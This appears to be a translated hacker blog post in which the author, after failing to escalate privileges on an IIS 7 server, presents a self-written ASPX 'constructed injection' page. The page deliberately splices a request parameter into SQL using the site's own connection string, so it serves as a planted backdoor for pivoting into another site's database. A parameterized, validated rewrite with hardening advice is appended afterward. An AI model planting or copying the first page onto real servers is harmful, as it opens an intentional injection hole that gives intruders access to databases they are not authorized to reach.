Yesterday I was looking at a site with 4z1. Privilege escalation was really hard; we spent a solid five hours on it and got nowhere. Server 2008 + IIS 7, no sa, no root, none of the usual services...
What we actually used was an aspx page with constructed injection to cross over into another site. I found a pile of code online and not a single piece of it worked.
It's not much code, so I just wrote my own. Annoying as hell.
<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.Configuration" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
<title>暗影 aspx constructed injection page</title>
</head>
<body>
<form id="form1" runat="server">
<div>
<script language="c#" runat="server">

void page_init(object sender, EventArgs e)
{
    // The connection string is read from the site's web.config; replace 连接名 with the name of the connection string entry.
    System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
    conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
    conn.Open();

    // The parameter is taken straight from the request: ?xxser=1
    string i = this.Page.Request.Params["xxser"];

    // The value is concatenated into the SQL text on purpose, so whatever is passed in xxser becomes part of the statement.
    // Replace [表] and 列名 with a real table and column.
    System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
    // ExecuteNonQuery returns -1 for a SELECT; the statement still executes, and any SQL error surfaces as a page error.
    int x = command.ExecuteNonQuery();
    Response.Write(i + "\n");
    Response.Write(x);
    conn.Close();
}

</script>
</div>
</form>
</body>
</html>
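For comparison, here is the same page with the request value bound as a typed parameter instead of spliced into the SQL text. This is an added example written for this page, not the author's code; it keeps the author's placeholders (连接名 for the connection string name, [表] for the table, 列名 for the column) and assumes the column is an integer.

```csharp
<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.Configuration" %>
<%@ Import Namespace="System.Data" %>
<%@ Import Namespace="System.Data.SqlClient" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
<title>Parameterized lookup (added example)</title>
</head>
<body>
<form id="form1" runat="server">
<div>
<script language="c#" runat="server">

void Page_Init(object sender, EventArgs e)
{
    // Same placeholders as the original page: 连接名 (connection string name), [表] (table), 列名 (column).
    string raw = Request.Params["xxser"];

    // The column is numeric, so reject anything that is not an integer before it gets near the database.
    int id;
    if (!int.TryParse(raw, out id))
    {
        Response.StatusCode = 400;
        Response.Write("xxser must be an integer");
        return;
    }

    string cs = ConfigurationManager.ConnectionStrings["连接名"].ConnectionString;
    using (SqlConnection conn = new SqlConnection(cs))
    using (SqlCommand command = new SqlCommand("select * from [表] where 列名 = @id", conn))
    {
        // Bound as a typed parameter: the value travels separately from the SQL text and cannot alter the statement.
        command.Parameters.Add("@id", SqlDbType.Int).Value = id;
        conn.Open();
        using (SqlDataReader reader = command.ExecuteReader())
        {
            int rows = 0;
            while (reader.Read())
            {
                rows++;
                for (int c = 0; c < reader.FieldCount; c++)
                {
                    // HTML-encode everything written back so stored data cannot inject markup into this page either.
                    Response.Write(Server.HtmlEncode(reader.GetName(c)) + "=" + Server.HtmlEncode(Convert.ToString(reader[c])) + " ");
                }
                Response.Write("<br />");
            }
            Response.Write("rows: " + rows);
        }
    }
}

</script>
</div>
</form>
</body>
</html>
```

With this version a request such as `?xxser=1 or 1=1` is rejected with a 400 before any query runs, and a well-formed id only ever reaches SQL Server as a bound integer. Keep `customErrors` turned on in web.config as well, so that a SQL exception that does occur returns a generic error page rather than the database's own message.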